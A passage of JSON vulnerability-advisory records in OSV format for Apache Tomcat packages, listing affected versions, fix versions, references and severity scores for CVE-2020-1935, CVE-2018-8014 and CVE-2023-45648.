"8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": 
"org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-qxf4-chvg-4r8r/GHSA-qxf4-chvg-4r8r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1935" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4673" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4448-1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0005" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd547be0c9d821b4b1000a694b8e58ef9f5e2d66db03a31dfe77c4b18@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra5dee390ad2d60307b8362505c059cd6a726de4d146d63dfce1e05e7@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ce7918faf347e7aac32be930bf26c233b0b140fe37af0bb294158b6@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r80e9c8417c77d52c62809168b96912bda70ddf7748f19f8210f745b1@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r660cd379afe346f10d72c0eaa8459ccc95d83aff181671b7e9076919@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r441c1f30a252bf14b07396286f6abd8089ce4240e91323211f1a2d75@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-25T16:18:59Z", "nvd_published_at": "2020-02-24T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r4x2-3cq5-hqvp", "published": "2018-10-17T16:32:32Z", "modified": "2024-03-12T05:32:05.310460Z", "aliases": [ "CVE-2018-8014" ], "summary": "The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins", "details": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. 
Therefore, it is expected that most users will not be impacted by this issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.9" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.8", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.32" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0RC1" }, { "fixed": "8.0.53" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", 
"8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.41" }, { "fixed": "7.0.88" } ] } ], "versions": [ "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r4x2-3cq5-hqvp/GHSA-r4x2-3cq5-hqvp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8014" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/2c9d8433bd3247a2856d4b2555447108758e813e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d83a76732e6804739b81d8b2056365307637b42d" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5877390a9605f56d9bd6859a54ccbfb16374a78b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/60f596a21fd6041335a3a1a4015d4512439cecb5" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fbfb713e4f8a4c0f81089b89450828011343593800cae3fb629192b1@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/fbfb713e4f8a4c0f81089b89450828011343593800cae3fb629192b1%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/06/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181018-0002" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20181017143233/http://www.securityfocus.com/bid/104203" }, { "type": "WEB", "url": "https://web.archive.org/web/20201207080723/http://www.securitytracker.com/id/1041888" }, { "type": "WEB", "url": "https://web.archive.org/web/20201207101131/http://www.securitytracker.com/id/1040998" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2469" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2470" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:3768" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-r4x2-3cq5-hqvp" }, { "type": "PACKAGE", "url": 
"https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-7.html" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-1188" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:53:40Z", "nvd_published_at": "2018-05-16T16:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r6j3-px5g-cq3x", "published": "2023-10-10T21:31:12Z", "modified": "2025-08-08T18:51:54.671117Z", "aliases": [ "BIT-tomcat-2023-45648", "CVE-2023-45648" ], "summary": "Apache Tomcat Improper Input Validation vulnerability", "details": "Improper Input Validation vulnerability in Apache 
Tomcat.\n\nTomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single \nrequest as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { 
"type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", 
"8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", 
